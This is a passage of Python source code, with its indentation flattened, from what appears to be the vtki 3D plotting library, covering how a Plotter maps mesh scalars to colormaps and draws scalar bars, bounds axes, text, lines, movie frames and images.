# Prefer texture first
if len(list(mesh.textures.keys())) > 0:
texture = True
# If no texture, plot any active scalar
else:
# Make sure scalar components are not vectors/tuples
scalars = mesh.active_scalar
if scalars is None:# or scalars.ndim != 1:
scalars = None
else:
if stitle is None:
stitle = mesh.active_scalar_info[1]
if texture == True or isinstance(texture, (str, int)):
texture = mesh._activate_texture(texture)
if texture:
if isinstance(texture, np.ndarray):
texture = numpy_to_texture(texture)
if not isinstance(texture, (vtk.vtkTexture, vtk.vtkOpenGLTexture)):
raise TypeError('Invalid texture type ({})'.format(type(texture)))
if mesh.GetPointData().GetTCoords() is None:
raise AssertionError('Input mesh does not have texture coordinates to support the texture.')
actor.SetTexture(texture)
# Set color to white by default when using a texture
if color is None:
color = 'white'
if scalars is None:
show_scalar_bar = False
self.mapper.SetScalarModeToUsePointFieldData()
# Scalar formatting ===================================================
if cmap is None:
cmap = kwargs.get('colormap', None)
if cmap is None:
cmap = rcParams['cmap']
title = 'Data' if stitle is None else stitle
if scalars is not None:
# if scalars is a string, then get the first array found with that name
append_scalars = True
if isinstance(scalars, str):
title = scalars
scalars = get_scalar(mesh, scalars,
preference=kwargs.get('preference', 'cell'), err=True)
if stitle is None:
stitle = title
#append_scalars = False
if not isinstance(scalars, np.ndarray):
scalars = np.asarray(scalars)
if rgb is False or rgb is None:
rgb = kwargs.get('rgba', False)
if rgb:
if scalars.ndim != 2 or scalars.shape[1] < 3 or scalars.shape[1] > 4:
raise ValueError('RGB array must be n_points/n_cells by 3/4 in shape.')
if scalars.ndim != 1:
if rgb:
pass
elif scalars.ndim == 2 and (scalars.shape[0] == mesh.n_points or scalars.shape[0] == mesh.n_cells):
scalars = np.linalg.norm(scalars.copy(), axis=1)
title = '{}-normed'.format(title)
else:
scalars = scalars.ravel()
if scalars.dtype == np.bool:
scalars = scalars.astype(np.float)
# Scalar interpolation approach
if scalars.shape[0] == mesh.n_points:
self.mesh._add_point_scalar(scalars, title, append_scalars)
self.mapper.SetScalarModeToUsePointData()
self.mapper.GetLookupTable().SetNumberOfTableValues(n_colors)
if interpolate_before_map:
self.mapper.InterpolateScalarsBeforeMappingOn()
elif scalars.shape[0] == mesh.n_cells:
self.mesh._add_cell_scalar(scalars, title, append_scalars)
self.mapper.SetScalarModeToUseCellData()
self.mapper.GetLookupTable().SetNumberOfTableValues(n_colors)
if interpolate_before_map:
self.mapper.InterpolateScalarsBeforeMappingOn()
else:
_raise_not_matching(scalars, mesh)
# Set scalar range
if rng is None:
rng = [np.nanmin(scalars), np.nanmax(scalars)]
elif isinstance(rng, float) or isinstance(rng, int):
rng = [-rng, rng]
if np.any(rng) and not rgb:
self.mapper.SetScalarRange(rng[0], rng[1])
# Flip if requested
table = self.mapper.GetLookupTable()
table.SetNanColor(nan_color)
if cmap is not None:
try:
from matplotlib.cm import get_cmap
except ImportError:
raise Exception('cmap requires matplotlib')
if isinstance(cmap, str):
cmap = get_cmap(cmap)
# ELSE: assume cmap is callable
ctable = cmap(np.linspace(0, 1, n_colors))*255
ctable = ctable.astype(np.uint8)
# Set opacities
if isinstance(opacity, str):
ctable[:,-1] = opacity_transfer_function(opacity, n_colors)
if flip_scalars:
ctable = np.ascontiguousarray(ctable[::-1])
table.SetTable(VN.numpy_to_vtk(ctable))
else: # no cmap specified
if flip_scalars:
table.SetHueRange(0.0, 0.66667)
else:
table.SetHueRange(0.66667, 0.0)
else:
self.mapper.SetScalarModeToUseFieldData()
# select view style
if not style:
style = 'surface'
style = style.lower()
if style == 'wireframe':
prop.SetRepresentationToWireframe()
if color is None:
color = rcParams['outline_color']
elif style == 'points':
prop.SetRepresentationToPoints()
elif style == 'surface':
prop.SetRepresentationToSurface()
else:
raise Exception('Invalid style. Must be one of the following:\n' +
'\t"surface"\n' +
'\t"wireframe"\n' +
'\t"points"\n')
prop.SetPointSize(point_size)
prop.SetAmbient(ambient)
# edge display style
if show_edges:
prop.EdgeVisibilityOn()
rgb_color = parse_color(color)
prop.SetColor(rgb_color)
if isinstance(opacity, (float, int)):
prop.SetOpacity(opacity)
prop.SetEdgeColor(parse_color(edge_color))
if render_points_as_spheres:
prop.SetRenderPointsAsSpheres(render_points_as_spheres)
if render_lines_as_tubes:
prop.SetRenderLinesAsTubes(render_lines_as_tubes)
# legend label
if label:
if not isinstance(label, str):
raise AssertionError('Label must be a string')
geom = single_triangle()
if scalars is not None:
geom = vtki.Box()
rgb_color = parse_color('black')
self._labels.append([geom, label, rgb_color])
# lighting display style
if not lighting:
prop.LightingOff()
# set line thickness
if line_width:
prop.SetLineWidth(line_width)
# Add scalar bar if available
if stitle is not None and show_scalar_bar and not rgb:
self.add_scalar_bar(stitle, **scalar_bar_args)
return actor
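# Hedged usage sketch for add_mesh() (Plotter and Sphere are defined elsewhere
# in the package; this only illustrates the keyword arguments documented above):
#
#   sphere = vtki.Sphere()
#   p = vtki.Plotter()
#   p.add_mesh(sphere, scalars=sphere.points[:, 2], cmap='viridis',
#              stitle='Elevation', show_edges=True)
#   p.show()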
def update_scalar_bar_range(self, clim, name=None):
"""Update the value range of the active or named scalar bar.
Parameters
----------
clim : 2 item list
The new range of scalar bar. Example: ``[-1, 2]``.
name : str, optional
The title of the scalar bar to update
"""
if isinstance(clim, float) or isinstance(clim, int):
clim = [-clim, clim]
if len(clim) != 2:
raise TypeError('clim argument must be a length 2 iterable of values: (min, max).')
if name is None:
if not hasattr(self, 'mapper'):
raise RuntimeError('This plotter does not have an active mapper.')
return self.mapper.SetScalarRange(*clim)
# Use the name to find the desired actor
def update_mapper(mapper):
return mapper.SetScalarRange(*clim)
try:
for m in self._scalar_bar_mappers[name]:
update_mapper(m)
except KeyError:
raise KeyError('Name ({}) not valid/not found in this plotter.'.format(name))
return
@property
def camera_set(self):
""" Returns if the camera of the active renderer has been set """
return self.renderer.camera_set
def get_default_cam_pos(self):
""" Return the default camera position of the active renderer """
return self.renderer.get_default_cam_pos()
@camera_set.setter
def camera_set(self, is_set):
""" Sets if the camera has been set on the active renderer"""
self.renderer.camera_set = is_set
@property
def renderer(self):
""" simply returns the active renderer """
return self.renderers[self._active_renderer_index]
@property
def bounds(self):
""" Returns the bounds of the active renderer """
return self.renderer.bounds
@property
def center(self):
""" Returns the center of the active renderer """
return self.renderer.center
def update_bounds_axes(self):
""" Update the bounds of the active renderer """
return self.renderer.update_bounds_axes()
def clear(self):
""" Clears plot by removing all actors and properties """
for renderer in self.renderers:
renderer.RemoveAllViewProps()
self._scalar_bar_slots = set(range(MAX_N_COLOR_BARS))
self._scalar_bar_slot_lookup = {}
self._scalar_bar_ranges = {}
self._scalar_bar_mappers = {}
self._scalar_bar_actors = {}
self._scalar_bar_widgets = {}
def remove_actor(self, actor, reset_camera=False):
"""
Removes an actor from the Plotter.
Parameters
----------
actor : vtk.vtkActor
Actor that has previously added to the Renderer.
reset_camera : bool, optional
Resets camera so all actors can be seen.
Returns
-------
success : bool
True when actor removed. False when actor has not been
removed.
"""
for renderer in self.renderers:
renderer.remove_actor(actor, reset_camera)
return True
def add_actor(self, uinput, reset_camera=False, name=None, loc=None,
culling=False):
"""
Adds an actor to render window. Creates an actor if input is
a mapper.
Parameters
----------
uinput : vtk.vtkMapper or vtk.vtkActor
vtk mapper or vtk actor to be added.
reset_camera : bool, optional
Resets the camera when true.
loc : int, tuple, or list
Index of the renderer to add the actor to. For example,
``loc=2`` or ``loc=(1, 1)``. If None, selects the last
active Renderer.
culling : bool optional
Does not render faces that should not be visible to the
plotter. This can be helpful for dense surface meshes,
especially when edges are visible, but can cause flat
meshes to be partially displayed. Default False.
Returns
-------
actor : vtk.vtkActor
The actor.
actor_properties : vtk.Properties
Actor properties.
"""
# add actor to the correct render window
self._active_renderer_index = self.loc_to_index(loc)
renderer = self.renderers[self._active_renderer_index]
return renderer.add_actor(uinput, reset_camera, name, culling)
def loc_to_index(self, loc):
"""
Return index of the render window given a location index.
Parameters
----------
loc : int, tuple, or list
Index of the renderer to add the actor to. For example,
``loc=2`` or ``loc=(1, 1)``.
Returns
-------
idx : int
Index of the render window.
"""
if loc is None:
return self._active_renderer_index
elif isinstance(loc, int):
return loc
elif isinstance(loc, collections.Iterable):
assert len(loc) == 2, '"loc" must contain two items'
return loc[0]*self.shape[1] + loc[1]
def index_to_loc(self, index):
"""Convert a 1D index location to the 2D location on the plotting grid
"""
sz = int(self.shape[0] * self.shape[1])
idxs = np.array([i for i in range(sz)], dtype=int).reshape(self.shape)
args = np.argwhere(idxs == index)
if len(args) < 1:
raise RuntimeError('Index ({}) is out of range.'.format(index))
return args[0]
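# Resulting mapping for a shape=(2, 2) plotter (illustration of the row-major
# grid built above):
#
#   index_to_loc(0) -> [0, 0]    index_to_loc(1) -> [0, 1]
#   index_to_loc(2) -> [1, 0]    index_to_loc(3) -> [1, 1]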
@property
def camera(self):
""" The active camera of the active renderer """
return self.renderer.camera
def add_axes_at_origin(self, loc=None):
"""
Add axes actor at the origin of a render window.
Parameters
----------
loc : int, tuple, or list
Index of the renderer to add the actor to. For example,
``loc=2`` or ``loc=(1, 1)``. When None, defaults to the
active render window.
Returns
--------
marker_actor : vtk.vtkAxesActor
vtkAxesActor actor
"""
self._active_renderer_index = self.loc_to_index(loc)
return self.renderers[self._active_renderer_index].add_axes_at_origin()
def show_bounds(self, mesh=None, bounds=None, show_xaxis=True,
show_yaxis=True, show_zaxis=True, show_xlabels=True,
show_ylabels=True, show_zlabels=True, italic=False,
bold=True, shadow=False, font_size=None,
font_family=None, color=None,
xlabel='X Axis', ylabel='Y Axis', zlabel='Z Axis',
use_2d=False, grid=None, location='closest', ticks=None,
all_edges=False, corner_factor=0.5, fmt=None,
minor_ticks=False, loc=None, padding=0.0):
"""
Adds bounds axes. Shows the bounds of the most recent input
mesh unless mesh is specified.
Parameters
----------
mesh : vtkPolydata or unstructured grid, optional
Input mesh to draw bounds axes around
bounds : list or tuple, optional
Bounds to override mesh bounds.
[xmin, xmax, ymin, ymax, zmin, zmax]
show_xaxis : bool, optional
Makes x axis visible. Default True.
show_yaxis : bool, optional
Makes y axis visible. Default True.
show_zaxis : bool, optional
Makes z axis visible. Default True.
show_xlabels : bool, optional
Shows x labels. Default True.
show_ylabels : bool, optional
Shows y labels. Default True.
show_zlabels : bool, optional
Shows z labels. Default True.
italic : bool, optional
Italicises axis labels and numbers. Default False.
bold : bool, optional
Bolds axis labels and numbers. Default True.
shadow : bool, optional
Adds a black shadow to the text. Default False.
font_size : float, optional
Sets the size of the label font. Defaults to 16.
font_family : string, optional
Font family. Must be either courier, times, or arial.
color : string or 3 item list, optional
Color of all labels and axis titles. Default white.
Either a string, rgb list, or hex color string. For example:
color='white'
color='w'
color=[1, 1, 1]
color='#FFFFFF'
xlabel : string, optional
Title of the x axis. Default "X Axis"
ylabel : string, optional
Title of the y axis. Default "Y Axis"
zlabel : string, optional
Title of the z axis. Default "Z Axis"
use_2d : bool, optional
A bug with vtk 6.3 on Windows seems to cause this function
to crash; this can be enabled for smoother plotting in
other environments.
grid : bool or str, optional
Add grid lines to the backface (``True``, ``'back'``, or
``'backface'``) or to the frontface (``'front'``,
``'frontface'``) of the axes actor.
location : str, optional
Set how the axes are drawn: either static (``'all'``),
closest triad (``'front'``), furthest triad (``'back'``),
static closest to the origin (``'origin'``), or outer
edges (``'outer'``) in relation to the camera
position. Options include: ``'all', 'front', 'back',
'origin', 'outer'``
ticks : str, optional
Set how the ticks are drawn on the axes grid. Options include:
``'inside', 'outside', 'both'``
all_edges : bool, optional
Adds an unlabeled and unticked box at the boundaries of
plot. Useful for when wanting to plot outer grids while
still retaining all edges of the boundary.
corner_factor : float, optional
If ``all_edges`` is enabled, this is the factor along each axis to
draw the default box. Default is 0.5 to show the full box.
loc : int, tuple, or list
Index of the renderer to add the actor to. For example,
``loc=2`` or ``loc=(1, 1)``. If None, selects the last
active Renderer.
padding : float, optional
An optional percent padding along each axial direction to cushion
the datasets in the scene from the axes annotations. Defaults to
have no padding
Returns
-------
cube_axes_actor : vtk.vtkCubeAxesActor
Bounds actor
Examples
--------
>>> import vtki
>>> from vtki import examples
>>> mesh = vtki.Sphere()
>>> plotter = vtki.Plotter()
>>> _ = plotter.add_mesh(mesh)
>>> _ = plotter.show_bounds(grid='front', location='outer', all_edges=True)
>>> plotter.show() # doctest:+SKIP
"""
kwargs = locals()
_ = kwargs.pop('self')
_ = kwargs.pop('loc')
self._active_renderer_index = self.loc_to_index(loc)
renderer = self.renderers[self._active_renderer_index]
renderer.show_bounds(**kwargs)
def add_bounds_axes(self, *args, **kwargs):
"""Deprecated"""
logging.warning('`add_bounds_axes` is deprecated. Use `show_bounds` or `show_grid`.')
return self.show_bounds(*args, **kwargs)
def add_bounding_box(self, color=None, corner_factor=0.5, line_width=None,
opacity=1.0, render_lines_as_tubes=False, lighting=None,
reset_camera=None, loc=None):
"""
Adds an unlabeled and unticked box at the boundaries of
plot. Useful for when wanting to plot outer grids while
still retaining all edges of the boundary.
Parameters
----------
corner_factor : float, optional
This is the factor along each axis to draw the default
box. Default is 0.5 to show the full box.
line_width : float, optional
Thickness of lines.
opacity : float, optional
Opacity of mesh. Should be between 0 and 1. Default 1.0
loc : int, tuple, or list
Index of the renderer to add the actor to. For example,
``loc=2`` or ``loc=(1, 1)``. If None, selects the last
active Renderer.
"""
kwargs = locals()
_ = kwargs.pop('self')
_ = kwargs.pop('loc')
self._active_renderer_index = self.loc_to_index(loc)
renderer = self.renderers[self._active_renderer_index]
return renderer.add_bounding_box(**kwargs)
def remove_bounding_box(self, loc=None):
"""
Removes bounding box from the active renderer.
Parameters
----------
loc : int, tuple, or list
Index of the renderer to add the actor to. For example,
``loc=2`` or ``loc=(1, 1)``. If None, selects the last
active Renderer.
"""
self._active_renderer_index = self.loc_to_index(loc)
renderer = self.renderers[self._active_renderer_index]
renderer.remove_bounding_box()
def remove_bounds_axes(self, loc=None):
"""
Removes bounds axes from the active renderer.
Parameters
----------
loc : int, tuple, or list
Index of the renderer to add the actor to. For example,
``loc=2`` or ``loc=(1, 1)``. If None, selects the last
active Renderer.
"""
self._active_renderer_index = self.loc_to_index(loc)
renderer = self.renderers[self._active_renderer_index]
renderer.remove_bounds_axes()
def subplot(self, index_x, index_y):
"""
Sets the active subplot.
Parameters
----------
index_x : int
Index of the subplot to activate in the x direction.
index_y : int
Index of the subplot to activate in the y direction.
"""
self._active_renderer_index = self.loc_to_index((index_x, index_y))
def show_grid(self, **kwargs):
"""
A wrapped implementation of ``show_bounds`` to change the default
behaviour to use gridlines and show the axes labels on the outer
edges. This is intended to be similar to ``matplotlib``'s ``grid``
function.
"""
kwargs.setdefault('grid', 'back')
kwargs.setdefault('location', 'outer')
kwargs.setdefault('ticks', 'both')
return self.show_bounds(**kwargs)
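# Usage note (a sketch): ``plotter.show_grid()`` behaves like
# ``plotter.show_bounds(grid='back', location='outer', ticks='both')``, with
# any extra keyword arguments passed straight through to show_bounds().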
def set_scale(self, xscale=None, yscale=None, zscale=None, reset_camera=True):
"""
Scale all the datasets in the scene of the active renderer.
Scaling is performed independently on the X, Y and Z axes.
A scale of zero is illegal and will be replaced with one.
Parameters
----------
xscale : float, optional
Scaling of the x axis. Must be greater than zero.
yscale : float, optional
Scaling of the y axis. Must be greater than zero.
zscale : float, optional
Scaling of the z axis. Must be greater than zero.
reset_camera : bool, optional
Resets camera so all actors can be seen.
"""
self.renderer.set_scale(xscale, yscale, zscale, reset_camera)
@property
def scale(self):
""" The scaling of the active renderer. """
return self.renderer.scale
def _update_axes_color(self, color):
"""Internal helper to set the axes label color"""
prop_x = self.axes_actor.GetXAxisCaptionActor2D().GetCaptionTextProperty()
prop_y = self.axes_actor.GetYAxisCaptionActor2D().GetCaptionTextProperty()
prop_z = self.axes_actor.GetZAxisCaptionActor2D().GetCaptionTextProperty()
if color is None:
color = rcParams['font']['color']
color = parse_color(color)
for prop in [prop_x, prop_y, prop_z]:
prop.SetColor(color[0], color[1], color[2])
prop.SetShadow(False)
return
def add_scalar_bar(self, title=None, n_labels=5, italic=False,
bold=True, title_font_size=None,
label_font_size=None, color=None,
font_family=None, shadow=False, mapper=None,
width=None, height=None, position_x=None,
position_y=None, vertical=None,
interactive=False, fmt=None, use_opacity=True,
outline=False):
"""
Creates scalar bar using the ranges as set by the last input
mesh.
Parameters
----------
title : string, optional
Title of the scalar bar. Default None
n_labels : int, optional
Number of labels to use for the scalar bar.
italic : bool, optional
Italicises title and bar labels. Default False.
bold : bool, optional
Bolds title and bar labels. Default True
title_font_size : float, optional
Sets the size of the title font. Defaults to None and is sized
automatically.
label_font_size : float, optional
Sets the size of the label font. Defaults to None and is sized
automatically.
color : string or 3 item list, optional, defaults to white
Either a string, rgb list, or hex color string. For example:
color='white'
color='w'
color=[1, 1, 1]
color='#FFFFFF'
font_family : string, optional
Font family. Must be either courier, times, or arial.
shadow : bool, optional
Adds a black shadow to the text. Defaults to False
width : float, optional
The percentage (0 to 1) width of the window for the colorbar
height : float, optional
The percentage (0 to 1) height of the window for the colorbar
position_x : float, optional
The percentage (0 to 1) along the windows's horizontal
direction to place the bottom left corner of the colorbar
position_y : float, optional
The percentage (0 to 1) along the windows's vertical
direction to place the bottom left corner of the colorbar
interactive : bool, optional
Use a widget to control the size and location of the scalar bar.
use_opacity : bool, optional
Optionally display the opacity mapping on the scalar bar
outline : bool, optional
Optionally outline the scalar bar to make opacity mappings more
obvious.
Notes
-----
Setting title_font_size, or label_font_size disables automatic font
sizing for both the title and label.
"""
if font_family is None:
font_family = rcParams['font']['family']
if label_font_size is None:
label_font_size = rcParams['font']['label_size']
if title_font_size is None:
title_font_size = rcParams['font']['title_size']
if color is None:
color = rcParams['font']['color']
if fmt is None:
fmt = rcParams['font']['fmt']
if vertical is None:
if rcParams['colorbar_orientation'].lower() == 'vertical':
vertical = True
# Automatically choose size if not specified
if width is None:
if vertical:
width = rcParams['colorbar_vertical']['width']
else:
width = rcParams['colorbar_horizontal']['width']
if height is None:
if vertical:
height = rcParams['colorbar_vertical']['height']
else:
height = rcParams['colorbar_horizontal']['height']
# check if mapper exists
if mapper is None:
if not hasattr(self, 'mapper'):
raise Exception('Mapper does not exist. ' +
'Add a mesh with scalars first.')
mapper = self.mapper
if title:
# Check that this data hasn't already been plotted
if title in list(self._scalar_bar_ranges.keys()):
rng = list(self._scalar_bar_ranges[title])
newrng = mapper.GetScalarRange()
oldmappers = self._scalar_bar_mappers[title]
# get max for range and reset everything
if newrng[0] < rng[0]:
rng[0] = newrng[0]
if newrng[1] > rng[1]:
rng[1] = newrng[1]
for m in oldmappers:
m.SetScalarRange(rng[0], rng[1])
mapper.SetScalarRange(rng[0], rng[1])
self._scalar_bar_mappers[title].append(mapper)
self._scalar_bar_ranges[title] = rng
# Color bar already present and ready to be used so returning
return
# Automatically choose location if not specified
if position_x is None or position_y is None:
try:
slot = min(self._scalar_bar_slots)
self._scalar_bar_slots.remove(slot)
self._scalar_bar_slot_lookup[title] = slot
except:
raise RuntimeError('Maximum number of color bars reached.')
if position_x is None:
if vertical:
position_x = rcParams['colorbar_vertical']['position_x']
position_x -= slot * width
else:
position_x = rcParams['colorbar_horizontal']['position_x']
if position_y is None:
if vertical:
position_y = rcParams['colorbar_vertical']['position_y']
else:
position_y = rcParams['colorbar_horizontal']['position_y']
position_y += slot * height
# Adjust to make sure on the screen
if position_x + width > 1:
position_x -= width
if position_y + height > 1:
position_y -= height
# parse color
color = parse_color(color)
# Create scalar bar
self.scalar_bar = vtk.vtkScalarBarActor()
self.scalar_bar.SetLookupTable(mapper.GetLookupTable())
self.scalar_bar.SetNumberOfLabels(n_labels)
# edit the size of the colorbar
self.scalar_bar.SetHeight(height)
self.scalar_bar.SetWidth(width)
self.scalar_bar.SetPosition(position_x, position_y)
if fmt is not None:
self.scalar_bar.SetLabelFormat(fmt)
if vertical:
self.scalar_bar.SetOrientationToVertical()
else:
self.scalar_bar.SetOrientationToHorizontal()
if label_font_size is None or title_font_size is None:
self.scalar_bar.UnconstrainedFontSizeOn()
if n_labels:
label_text = self.scalar_bar.GetLabelTextProperty()
label_text.SetColor(color)
label_text.SetShadow(shadow)
# Set font
label_text.SetFontFamily(parse_font_family(font_family))
label_text.SetItalic(italic)
label_text.SetBold(bold)
if label_font_size:
label_text.SetFontSize(label_font_size)
# Set properties
if title:
rng = mapper.GetScalarRange()
self._scalar_bar_ranges[title] = rng
self._scalar_bar_mappers[title] = [mapper]
self.scalar_bar.SetTitle(title)
title_text = self.scalar_bar.GetTitleTextProperty()
title_text.SetJustificationToCentered()
title_text.SetItalic(italic)
title_text.SetBold(bold)
title_text.SetShadow(shadow)
if title_font_size:
title_text.SetFontSize(title_font_size)
# Set font
title_text.SetFontFamily(parse_font_family(font_family))
# set color
title_text.SetColor(color)
self._scalar_bar_actors[title] = self.scalar_bar
if interactive is None:
interactive = rcParams['interactive']
if self.shape != (1, 1):
interactive = False
elif interactive and self.shape != (1, 1):
err_str = 'Interactive scalar bars disabled for multi-renderer plots'
raise Exception(err_str)
if interactive and hasattr(self, 'iren'):
self.scalar_widget = vtk.vtkScalarBarWidget()
self.scalar_widget.SetScalarBarActor(self.scalar_bar)
self.scalar_widget.SetInteractor(self.iren)
self.scalar_widget.SetEnabled(1)
rep = self.scalar_widget.GetRepresentation()
# self.scalar_widget.On()
if vertical is True or vertical is None:
rep.SetOrientation(1) # 0 = Horizontal, 1 = Vertical
else:
rep.SetOrientation(0) # 0 = Horizontal, 1 = Vertical
self._scalar_bar_widgets[title] = self.scalar_widget
if use_opacity:
self.scalar_bar.SetUseOpacity(True)
if outline:
self.scalar_bar.SetDrawFrame(True)
frame_prop = self.scalar_bar.GetFrameProperty()
frame_prop.SetColor(color)
else:
self.scalar_bar.SetDrawFrame(False)
self.add_actor(self.scalar_bar, reset_camera=False)
def update_scalars(self, scalars, mesh=None, render=True):
"""
Updates scalars of an object in the plotter.
Parameters
----------
scalars : np.ndarray
Scalars to replace existing scalars.
mesh : vtk.PolyData or vtk.UnstructuredGrid, optional
Object that has already been added to the Plotter. If
None, uses last added mesh.
render : bool, optional
Forces an update to the render window. Default True.
"""
if mesh is None:
mesh = self.mesh
if isinstance(mesh, (collections.Iterable, vtki.MultiBlock)):
# Recursive if need to update scalars on many meshes
for m in mesh:
self.update_scalars(scalars, mesh=m, render=False)
if render:
self.ren_win.Render()
return
if isinstance(scalars, str):
# Grab scalar array if name given
scalars = get_scalar(mesh, scalars)
if scalars is None:
if render:
self.ren_win.Render()
return
if scalars.shape[0] == mesh.GetNumberOfPoints():
data = mesh.GetPointData()
elif scalars.shape[0] == mesh.GetNumberOfCells():
data = mesh.GetCellData()
else:
_raise_not_matching(scalars, mesh)
vtk_scalars = data.GetScalars()
if vtk_scalars is None:
raise Exception('No active scalars')
s = VN.vtk_to_numpy(vtk_scalars)
s[:] = scalars
data.Modified()
try:
# Why are the points updated here? Not all datasets have points
# and only the scalar array is modified by this function...
mesh.GetPoints().Modified()
except:
pass
if render:
self.ren_win.Render()
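# Hedged sketch of the update_scalars()/update() animation pattern (assumes an
# interactive window already shown with auto_close=False and `mesh` added):
#
#   for phase in np.linspace(0, 2 * np.pi, 20):
#       plotter.update_scalars(np.sin(mesh.points[:, 0] + phase))
#       plotter.update(30)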
def update_coordinates(self, points, mesh=None, render=True):
"""
Updates the points of an object in the plotter.
Parameters
----------
points : np.ndarray
Points to replace existing points.
mesh : vtk.PolyData or vtk.UnstructuredGrid, optional
Object that has already been added to the Plotter. If
None, uses last added mesh.
render : bool, optional
Forces an update to the render window. Default True.
"""
if mesh is None:
mesh = self.mesh
mesh.points = points
if render:
self._render()
def close(self):
""" closes render window """
# must close out axes marker
if hasattr(self, 'axes_widget'):
del self.axes_widget
# reset scalar bar stuff
self._scalar_bar_slots = set(range(MAX_N_COLOR_BARS))
self._scalar_bar_slot_lookup = {}
self._scalar_bar_ranges = {}
self._scalar_bar_mappers = {}
if hasattr(self, 'ren_win'):
self.ren_win.Finalize()
del self.ren_win
if hasattr(self, '_style'):
del self._style
if hasattr(self, 'iren'):
self.iren.RemoveAllObservers()
del self.iren
if hasattr(self, 'textActor'):
del self.textActor
# end movie
if hasattr(self, 'mwriter'):
try:
self.mwriter.close()
except BaseException:
pass
def add_text(self, text, position=None, font_size=50, color=None,
font=None, shadow=False, name=None, loc=None):
"""
Adds text to plot object in the top left corner by default
Parameters
----------
text : str
The text to add to the rendering
position : tuple(float)
Length 2 tuple of the pixelwise position to place the bottom
left corner of the text box. Default is to find the top left corner
of the rendering window and place the text box up there.
font : string, optional
Font name may be courier, times, or arial
shadow : bool, optional
Adds a black shadow to the text. Defaults to False
name : str, optional
The name for the added actor so that it can be easily updated.
If an actor of this name already exists in the rendering window, it
will be replaced by the new actor.
loc : int, tuple, or list
Index of the renderer to add the actor to. For example,
``loc=2`` or ``loc=(1, 1)``.
Returns
-------
textActor : vtk.vtkTextActor
Text actor added to plot
"""
if font is None:
font = rcParams['font']['family']
if font_size is None:
font_size = rcParams['font']['size']
if color is None:
color = rcParams['font']['color']
if position is None:
# Set the position of the text to the top left corner
window_size = self.window_size
x = (window_size[0] * 0.02) / self.shape[0]
y = (window_size[1] * 0.90) / self.shape[0]
position = [x, y]
self.textActor = vtk.vtkTextActor()
self.textActor.SetPosition(position)
self.textActor.GetTextProperty().SetFontSize(font_size)
self.textActor.GetTextProperty().SetColor(parse_color(color))
self.textActor.GetTextProperty().SetFontFamily(FONT_KEYS[font])
self.textActor.GetTextProperty().SetShadow(shadow)
self.textActor.SetInput(text)
self.add_actor(self.textActor, reset_camera=False, name=name, loc=loc)
return self.textActor
def open_movie(self, filename, framerate=24):
"""
Establishes a connection to the ffmpeg writer
Parameters
----------
filename : str
Filename of the movie to open. Filename should end in mp4,
but other filetypes may be supported. See "imageio.get_writer"
framerate : int, optional
Frames per second.
"""
if isinstance(vtki.FIGURE_PATH, str) and not os.path.isabs(filename):
filename = os.path.join(vtki.FIGURE_PATH, filename)
self.mwriter = imageio.get_writer(filename, fps=framerate)
def open_gif(self, filename):
"""
Open a gif file.
Parameters
----------
filename : str
Filename of the gif to open. Filename must end in gif.
"""
if filename[-3:] != 'gif':
raise Exception('Unsupported filetype. Must end in .gif')
if isinstance(vtki.FIGURE_PATH, str) and not os.path.isabs(filename):
filename = os.path.join(vtki.FIGURE_PATH, filename)
self._gif_filename = os.path.abspath(filename)
self.mwriter = imageio.get_writer(filename, mode='I')
def write_frame(self):
""" Writes a single frame to the movie file """
if not hasattr(self, 'mwriter'):
raise AssertionError('This plotter has not opened a movie or GIF file.')
self.mwriter.append_data(self.image)
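# Hedged movie-recording sketch using open_movie()/write_frame(); Azimuth() is
# plain vtkCamera API and render() is provided by the concrete Plotter class:
#
#   plotter.open_movie('orbit.mp4', framerate=24)
#   for _ in range(72):
#       plotter.camera.Azimuth(5)   # orbit the scene 5 degrees per frame
#       plotter.render()
#       plotter.write_frame()
#   plotter.close()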
@property
def window_size(self):
""" returns render window size """
return list(self.ren_win.GetSize())
@window_size.setter
def window_size(self, window_size):
""" set the render window size """
self.ren_win.SetSize(window_size[0], window_size[1])
def _run_image_filter(self, ifilter):
# Update filter and grab pixels
ifilter.Modified()
ifilter.Update()
image = vtki.wrap(ifilter.GetOutput())
img_size = image.dimensions
img_array = vtki.utilities.point_scalar(image, 'ImageScalars')
# Reshape and write
tgt_size = (img_size[1], img_size[0], -1)
return img_array.reshape(tgt_size)[::-1]
@property
def image_depth(self):
""" Returns an image array of current render window """
ifilter = vtk.vtkWindowToImageFilter()
ifilter.SetInput(self.ren_win)
ifilter.ReadFrontBufferOff()
ifilter.SetInputBufferTypeToZBuffer()
return self._run_image_filter(ifilter)
@property
def image(self):
""" Returns an image array of current render window """
if not hasattr(self, 'ren_win') and hasattr(self, 'last_image'):
return self.last_image
ifilter = vtk.vtkWindowToImageFilter()
ifilter.SetInput(self.ren_win)
ifilter.ReadFrontBufferOff()
if self.image_transparent_background:
ifilter.SetInputBufferTypeToRGBA()
else:
ifilter.SetInputBufferTypeToRGB()
return self._run_image_filter(ifilter)
def enable_eye_dome_lighting(self):
"""Enable eye dome lighting (EDL) for active renderer"""
return self.renderer.enable_eye_dome_lighting()
def disable_eye_dome_lighting(self):
"""Disable eye dome lighting (EDL) for active renderer"""
return self.renderer.disable_eye_dome_lighting()
def add_lines(self, lines, color=(1, 1, 1), width=5, label=None, name=None):
"""
Adds lines to the plotting object.
Parameters
----------
lines : np.ndarray or vtki.PolyData
Points representing line segments. For example, two line segments
would be represented as:
np.array([[0, 0, 0], [1, 0, 0], [1, 0, 0], [1, 1, 0]])
color : string or 3 item list, optional, defaults to white
Either a string, rgb list, or hex color string. For example:
color='white'
color='w'
color=[1, 1, 1]
color='#FFFFFF'
width : float, optional
Thickness of lines
name : str, optional
The name for the added actor so that it can be easily updated.
If an actor of this name already exists in the rendering window, it
will be replaced by the new actor.
Returns
-------
actor : vtk.vtkActor
Lines actor.
"""
if not isinstance(lines, np.ndarray):
raise Exception('Input should be an array of point segments')
lines = vtki.lines_from_points(lines)
# Create mapper and add lines
mapper = vtk.vtkDataSetMapper()
mapper.SetInputData(lines)
rgb_color = parse_color(color)
# legend label
if label:
if not isinstance(label, str):
raise AssertionError('Label must be a string')
self._labels.append([lines, label, rgb_color])
# Create actor (use a dedicated variable so the lines actor does not
# overwrite self.scalar_bar)
actor = vtk.vtkActor()
actor.SetMapper(mapper)
actor.GetProperty().SetLineWidth(width)
actor.GetProperty().EdgeVisibilityOn()
actor.GetProperty().SetEdgeColor(rgb_color)
actor.GetProperty().SetColor(rgb_color)
actor.GetProperty().LightingOff()
# Add to renderer
self.add_actor(actor, reset_camera=False, name=name)
return actor
def remove_scalar_bar(self):
""" Removes scalar bar """
if hasattr(self, 'scalar_bar'):
